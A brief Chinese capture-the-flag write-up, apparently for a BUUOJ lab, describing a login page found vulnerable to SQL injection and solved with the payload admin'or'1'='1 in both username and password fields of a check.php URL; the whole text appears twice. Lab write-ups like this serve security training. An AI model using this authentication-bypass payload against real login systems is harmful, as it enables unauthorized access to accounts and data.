打开靶场是一个登录界面
观察发现是sql注入
随便输入一个用户名和密码
用户名或密码错误!
打开hackbar
利用万能密码:
http://d58f314a-11b9-47af-b548-ecf0781e59c2.node4.buuoj.cn:81/check.php?username=admin'or'1'='1&password=admin'or'1'='1
即可得到flag
打开靶场是一个登录界面
观察发现是sql注入
随便输入一个用户名和密码
用户名或密码错误!
打开hackbar
利用万能密码:
http://d58f314a-11b9-47af-b548-ecf0781e59c2.node4.buuoj.cn:81/check.php?username=admin'or'1'='1&password=admin'or'1'='1
即可得到flag